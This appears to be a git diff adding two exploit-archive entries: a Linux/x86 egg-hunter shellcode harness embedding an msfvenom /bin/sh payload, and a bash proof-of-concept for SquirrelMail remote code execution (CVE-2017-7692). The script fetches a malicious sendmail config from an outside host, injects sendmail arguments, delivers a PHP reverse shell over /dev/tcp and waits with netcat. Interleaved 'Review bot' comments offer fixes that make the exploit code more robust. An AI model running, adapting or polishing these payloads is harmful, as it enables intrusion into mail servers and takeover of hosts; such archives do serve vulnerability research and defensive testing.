diff --git a/files.csv b/files.csv
index b1392ae14..d404872e6 100644
--- a/files.csv
+++ b/files.csv
@@ -15460,6 +15460,7 @@ id,file,description,date,author,platform,type,port
 41894,platforms/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote,0
 41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0
 41903,platforms/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",windows,remote,0
+41910,platforms/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16094,6 +16095,7 @@ id,file,description,date,author,platform,type,port
 41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
 41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
 41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
+41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egg-hunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
diff --git a/platforms/lin_x86/shellcode/41909.c b/platforms/lin_x86/shellcode/41909.c
new file mode 100755
index 000000000..1cd4f2326
--- /dev/null
+++ b/platforms/lin_x86/shellcode/41909.c
@@ -0,0 +1,48 @@
+// Description: a 18 bytes egg hunter on contigous memory segments
+//
+// You are free to do whatever you want of this shellcode
+//
+// @phackt_ul
+/*
+global _start
+
+section .text
+_start:
+
+ mov eax, _start ; we set a valid .text address into eax
+ mov ebx, dword 0x50905091 ; we can avoid an 8 bytes tag in egg if the tag
+ dec ebx ; can not be found in the egg hunter, that's why we decrement to look for
+ ; 0x50905090 - push eax, nop, push eax, nop
+
+next_addr:
+
+ inc eax
+ cmp dword [eax], ebx ; do we found the tag ?
+ jne next_addr
+ jmp eax ; yes we do so we jump to the egg
+*/
+#include
+#include
+
+unsigned char egghunter[] = \
+"\xb8\x60\x80\x04\x08\xbb\x91\x50\x90\x50\x4b\x40\x39\x18\x75\xfb\xff\xe0";
+
+unsigned char egg[] = \
+"\x90\x50\x90\x50" // egg mark - do not remove
+"\xbd\x64\xb2\x0c\xf4\xda\xc2\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" // msfvenom -p linux/x86/exec CMD=/bin/sh -f c -b \x00
+"\x0b\x83\xc2\x04\x31\x6a\x11\x03\x6a\x11\xe2\x91\xd8\x07\xac"
+"\xc0\x4f\x7e\x24\xdf\x0c\xf7\x53\x77\xfc\x74\xf4\x87\x6a\x54"
+"\x66\xee\x04\x23\x85\xa2\x30\x3b\x4a\x42\xc1\x13\x28\x2b\xaf"
+"\x44\xdf\xc3\x2f\xcc\x4c\x9a\xd1\x3f\xf2";
+
+void main()
+{
+
+ printf("Egg hunter shellcode Length: %d\n", strlen(egghunter));
+ printf("Egg shellcode Length: %d\n", strlen(egg));
+
+ int (*ret)() = (int(*)())egghunter;
+
+ ret();
+
+}
diff --git a/platforms/linux/remote/41910.sh b/platforms/linux/remote/41910.sh
new file mode 100755
index 000000000..1aeb0f5ed
--- /dev/null
+++ b/platforms/linux/remote/41910.sh
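Review bot: `void main()` is not a valid signature for a hosted C program, and both `printf` calls pass the `size_t` result of `strlen` to a `%d` conversion; the harness should read `int main(void)` ending in `return 0;` and use `printf("Egg hunter shellcode Length: %zu\n", strlen(egghunter));` (same change for the `egg` line). The two `#include` lines carry no header name in this rendering; presumably `<stdio.h>` and `<string.h>` were stripped by the page rather than omitted from the commit, but that is worth confirming against the raw file before it is compiled.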
@@ -0,0 +1,194 @@ +#!/bin/bash +# +int='\033[94m + __ __ __ __ __ + / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ + / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ + / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) + /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ + /____/ + +SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) + +SquirrelMail_RCE_exploit.sh (ver. 1.0) + +Discovered and coded by + +Dawid Golunski (@dawid_golunski) +https://legalhackers.com + +ExploitBox project: +https://ExploitBox.io + +\033[0m' + +# Quick and messy PoC for SquirrelMail webmail application. +# It contains payloads for 2 vectors: +# * File Write +# * RCE +# It requires user credentials and that SquirrelMail uses +# Sendmail method as email delivery transport +# +# +# Full advisory URL: +# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html +# Exploit URL: +# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh +# +# Tested on: # Ubuntu 16.04 +# squirrelmail package version: +# 2:1.4.23~svn20120406-2ubuntu1.16.04.1 +# +# Disclaimer: +# For testing purposes only +# +# +# ----------------------------------------------------------------- +# +# Interested in vulns/exploitation? +# Stay tuned for my new project - ExploitBox +# +# .;lc' +# .,cdkkOOOko;. +# .,lxxkkkkOOOO000Ol' +# .':oxxxxxkkkkOOOO0000KK0x:' +# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. +# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. +# '';ldxxxxxdc,. ,oOXXXNNNXd;,. +# .ddc;,,:c;. ,c: .cxxc:;:ox: +# .dxxxxo, ., ,kMMM0:. ., .lxxxxx: +# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: +# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: +# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: +# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: +# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: +# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: +# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: +# .dxxxxxdl;. ., .. .;cdxxxxxx: +# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: +# .':oxxxxxxxxxdl;. 
.;lxkkkkkxxxxdc,. +# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. +# .':oxxxxxxxxx.ckkkkkkkkxl,. +# .,cdxxxxx.ckkkkkxc. +# .':odx.ckxl,. +# .,.'. +# +# https://ExploitBox.io +# +# https://twitter.com/Exploit_Box +# +# ----------------------------------------------------------------- + +sqspool="/var/spool/squirrelmail/attach/" + +echo -e "$int" +#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n" +#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n" +#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n" + + +# Base URL +if [ $# -ne 1 ]; then + echo -e "Usage: \n$0 SquirrelMail_URL" + echo -e "Example: \n$0 http://target/squirrelmail/ \n" + + exit 2 +fi +URL="$1" + +# Log in +echo -e "\n[*] Enter SquirrelMail user credentials" +read -p "user: " squser +read -sp "pass: " sqpass + +echo -e "\n\n[*] Logging in to SquirrelMail at $URL" +curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect +if [ $? 
-eq 0 ]; then + echo "Invalid creds" + exit 2 +fi +sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" +keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" + + +# Prepare Sendmail cnf +# +# * The config will launch php via the following stanza: +# +# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, +# T=DNS/RFC822/X-Unix, +# A=php -- $u $h ${client_addr} +# +wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf + +# Upload config +echo -e "\n\n[*] Uploading Sendmail config" +token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" +attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`" +if [ ${#attachid} -lt 32 ]; then + echo "Something went wrong. Failed to upload the sendmail file." + exit 2 +fi + +# Create Sendmail cmd string according to selected payload +echo -e "\n\n[?] Select payload\n" +# SELECT PAYLOAD +echo "1 - File write (into /tmp/sqpoc)" +echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)" +echo +read -p "[1-2] " pchoice + +case $pchoice in + 1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc" + ;; + + 2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid" + ;; +esac + +if [ $pchoice -eq 2 ]; then + echo + read -p "Reverese shell IP: " reverse_ip + read -p "Reverese shell PORT: " reverse_port +fi + +# Reverse shell code +phprevsh=" +/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\"; + file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . 
\$cmd); + system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\"); +?>" + + +# Set sendmail params in user settings +echo -e "\n[*] Injecting Sendmail command parameters" +token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" +curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null +if [ $? -ne 0 ]; then + echo "Failed to inject sendmail parameters" + exit 2 +fi + +# Send email which triggers the RCE vuln and runs phprevsh +echo -e "\n[*] Sending the email to trigger the vuln" +(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \ +-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) & + +if [ $pchoice -eq 2 ]; then + echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port" + nc -vv -l -p $reverse_port +else + echo -e "\n[*] The test file should have been written at /tmp/sqpoc" +fi + +grep -q "302 Found" /tmp/sheaders +if [ $? -eq 1 ]; then + echo "There was a problem with sending email" + exit 2 +fi + + +# Done +echo -e "\n[*] All done. Exiting" +
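Review bot: The `case $pchoice in` block has no default arm, so any answer other than 1 or 2 leaves `payload` unset, reaches `[ $pchoice -eq 2 ]` (which errors on non-integer input) and then posts an empty `new_email_address`; add `*) echo "Invalid choice" >&2; exit 2 ;;` before `esac`. The fixed paths `/tmp/sqdata`, `/tmp/smcnf-exp` and `/tmp/sheaders` are predictable and reused across runs, so a stale or pre-created file from another local user would be picked up; `mktemp` with a cleanup `trap ... EXIT` avoids that. `$URL` and `$pchoice` are also expanded unquoted in several `curl` and `[ ]` lines, which ShellCheck will flag.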